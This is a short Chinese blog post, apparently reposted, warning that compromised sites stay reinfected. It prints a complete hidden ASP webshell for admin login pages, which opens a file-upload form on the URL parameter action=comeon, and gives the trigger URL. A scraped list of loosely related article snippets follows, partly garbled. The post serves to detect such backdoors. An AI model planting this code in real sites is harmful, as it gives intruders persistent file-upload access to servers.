如果你的网站被入侵,你辛苦删掉以后,没好几天。又“病”了。建议你看看你的管理登录页面有没有类似下面这样的代码:

<%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>

表面看是没什么区别的 这就是隐藏的WEBSHELL

只要这样:login.asp?action=comeon

出现了上传页面!

转载于:https://www.cnblogs.com/mujj/articles/1978710.html

隐藏在管理员登录页面的危险相关推荐

  1. web管理员登录页面

    配置xml文件 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi=" ...

  2. day02【后台】管理员登录

    day02[后台]管理员登录 1.创建常量类 创建常量类,用于管理整个系统中所用到的常量 public class CrowdConstant {public static final String ...

  3. Spring+SpringMVC+MyBatis明日方舟版人员信息管理系统前端页面代码前后端交互+SSM框架 管理员登录 游客登录 普通用户登录 人员的增删改查 信息更新 图片上传 分页查询)

    Spring+SpringMVC+MyBatis明日方舟版人员信息管理系统前端页面代码(前后端交互+SSM框架 管理员登录 游客登录 普通用户登录 人员的增删改查 信息更新 图片上传 分页查询 修改密 ...

  4. 管理员用户不同身份登录页面代码PHP,wordpress管理员登录和普通用户登录后跳转到不同页面-♚付涛纪实阁♚...

    这篇文章将向您展示WordPress用户登录后如何重定向到指定页面或者文章的技巧. 一.重定向到网站管理面板. 将以下代码添加到您的当前主题的 functions.php 文件中 二.重定向到指定页面 ...

  5. 第一天总结管理员用户的登录页面

    管理员用户的登录页面: 先实例化出管理员用户 先获取前端发送的数据,把数据传给service中的方法,然后通过调用,返回一个布尔数据,对布尔数据进行判断,如果为true,则说明账号和密码都正确,把数据 ...

  6. HTML管理员页面怎么写,一个HTML管理员登录界面

    管理员登录 rel=stylesheet type=text/css href="images/css.css"> body td { FONT-SIZE: 9pt; } 管 ...

  7. idea 启动界面导入项目_如何为您的项目启动有效的登录页面

    idea 启动界面导入项目 by Christian-Peter Heimbach 通过克里斯蒂安·彼得·海姆巴赫 如何为您的项目启动有效的登录页面 (How to launch an effecti ...

  8. web渗透测试之攻破登录页面

    web渗透测试之攻破登录页面 当我们在做渗透测试时,无论厂商项目还是src众测项目,都会遇到给一堆登录系统的URL,然后让我们自己去测,能不能进去全看天的状况,本文将讲一下怎么突破这种封闭的web系统 ...

  9. 设计登录页面测试用例,页面包括账号、密码和验证码,账号字符长度小于20,密码字符长度小于30,验证码数字和字母组合,长度为4

    1. 正确输入账号.密码和验证码,登录成功. 2. 账号为空,应提示"请输入账号". 3. 账号长度为19个字符,符合要求. 4. 账号长度为20个字符,符合要求. 5. 账号长度 ...

最新文章

  1. 常用的python命令行解析库
  2. 如何领导团队做好技术债管理?
  3. 使用jq工具在Shell命令行处理JSON数据
  4. 计算机在热处理上有何应用,计算机在热处理中的应用
  5. 二层交换机和三层交换机的区别
  6. Error: Cannot find module ‘babel-preset-es2015‘
  7. 阿里云服务器ECS中扩容云盘后磁盘容量没有增加的解决方法
  8. python实现数据恢复软件手机版下载_知名下载软件,总算出手机版了
  9. 「硬见小百科」100个示波器基础知识问答
  10. 不藏了,我的一千行 MySQL 学习笔记(2万字长文)
  11. 机器学习图像特征提取—颜色(RGB、HSV、Lab)特征提取并绘制直方图
  12. CAD角度标注命令,标注CAD图纸
  13. markdown化学表达式
  14. 三种遍历 list对象从而选择性取值的方式
  15. JetBrains 在中国被频繁破解,官方是如何看待的
  16. 数据库中的三种完整性:域、实体、参照完整性
  17. java使用CRC32计算校验和
  18. 属猪人士的2009年运程
  19. linux. signal信号,Linux下signal信号汇总
  20. 5G时代来临,一张思维导图描绘未来场景

热门文章

  1. Ubifs Support
  2. 策略模式(Header-First笔记)
  3. 在RichTextEditor组件中使用自定义右键。
  4. Linux Priority VS Nice
  5. leetcode算法题--平衡二叉树
  6. KVM virtio_net之NAPI机制(十七)
  7. leetcode算法题--除数博弈★
  8. leetcode算法题--比特位计数
  9. 计算机基础知识应用文档,计算机基础知识与应用
  10. R数据导入导出(一): read.table()和read.csv()的区别